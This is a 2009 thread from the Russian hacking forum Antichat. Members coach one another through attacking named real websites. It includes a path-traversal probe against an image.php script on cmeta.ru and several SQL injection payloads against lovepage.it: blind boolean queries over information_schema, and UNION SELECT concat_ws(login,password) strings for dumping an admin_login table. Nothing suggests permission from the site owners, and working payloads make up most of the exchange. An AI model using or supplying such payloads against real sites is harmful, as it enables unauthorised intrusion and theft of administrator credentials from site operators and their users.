ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
30.09.2009, 10:31
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 53
Провел на форуме:
170968
Репутация:
10
|
|
// query strings
$query_string = '?in_wp='.$in_wp.'&return_function='.$return_f unction.'&lang='.$lang_include.'&folder='. $folderpath.'&instance_img_dir='.$instance_img _dir.'&sort_by='.$sort_by.'&sort_dir='.$so rt_dir.'&thumbnails='.$doThumbs;
$query_inputs = '<input type="hidden" name="lang" value="'.$lang_include.'">
<input type="hidden" name="return_function" value="'.$return_function.'">
<input type="hidden" name="folder" value="'.$folderpath.'">
<input type="hidden" name="instance_img_dir" value="'.$instance_img_dir.'">
<input type="hidden" name="in_wp" value="'.$in_wp.'">
<input type="hidden" name="sort_by" value="'.$sort_by.'">
<input type="hidden" name="sort_dir" value="'.$sort_dir.'">
<input type="hidden" name="thumbnails" value="'.$doThumbs.'">';
я так понимаю, что фильтра нет, просто, если пишешь с ../ и указываешь любое имя файла, то уже нет ошибки о том, что файл не существует, это и насторожило..
|
|
|
30.09.2009, 10:34
|
|
Познающий
Регистрация: 18.11.2008
Сообщений: 53
Провел на форуме:
170968
Репутация:
10
|
|
http://www.cmeta.ru/new/mambots/editors/wysiwygpro/image.php?lang=
|
|
|
|
30.09.2009, 11:11
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426
Репутация:
5
|
|
Незнаю как раскрутить _http://www.lovepage.it/dating-online/cronologia.asp?id=%27%27
Что поставить вместо id чтобы подбирать таблицы union+select+1 и тд
|
|
|
|
30.09.2009, 11:35
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb'+and+if(ascii(substri ng((select+table_name+from+information_schema.tabl es+limit+0,1),1,1))>1,1,0)--+
|
|
|
|
30.09.2009, 11:48
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426
Репутация:
5
|
|
А как таблицы узнать?И данные выводить.
Последний раз редактировалось 2Fed123; 30.09.2009 в 11:51..
|
|
|
|
30.09.2009, 11:51
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
https://forum.antichat.ru/threadnav43966-1-10.html
3.1 Посимвольный перебор
|
|
|
|
30.09.2009, 12:48
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426
Репутация:
5
|
|
Узнал что есть таблица admin_login.Как поля выводить и потом concat(login) типо того сделать.
Извиняюсь за назойливость.
|
|
|
|
30.09.2009, 12:51
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
30.09.2009, 16:00
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от 2Fed123
Узнал что есть таблица admin_login.Как поля выводить и потом concat(login) типо того сделать.
Извиняюсь за назойливость.
id=-1+union+select+1,2,3,4,5,6,7+from+admin_login+--+
Это к примеру как выглядит твой запрос поначалу.
id=-1+union+select+1,2,3,concat_ws(0x3a,login,password ),5,6,7+from+admin_login+--+
Конечно столбцы могут называться по другому, я тебе просто привёл пример.
А вобще юзай поиск, или же читай тему про SQL Инъекцию.
|
|
|
|
30.09.2009, 19:49
|
|
Познающий
Регистрация: 26.02.2009
Сообщений: 65
Провел на форуме:
226426
Репутация:
5
|
|
Сообщение от Ctacok
Это к примеру как выглядит твой запрос поначалу.
Конечно столбцы могут называться по другому, я тебе просто привёл пример.
А вобще юзай поиск, или же читай тему про SQL Инъекцию.
Была бы простая инъекция-непопросил бы помоши.Твое предложение к сожелению неподойдет 
Узнал что есть таблица acces.
Когда делаю запрос _http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb%27+and+if(ascii(subst ring((select+column_name+from+acces),1,1))%3E=1,1, 0)--+
Ошибка.Пробовал перекодировать в хекс,все равно,но по ошибка и если попробовать _http://www.lovepage.it/dating-online/profilo_utente.asp?ID=rogerb%27+and+if(ascii(subst ring((select+column_name+from++CHARACTER_SETS),1,1 ))%3E=1,1,0)--+
Прошу сильно не пинать-с блиндом только учусь работать( и с POST инъекциями  )
Последний раз редактировалось 2Fed123; 30.09.2009 в 20:02..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
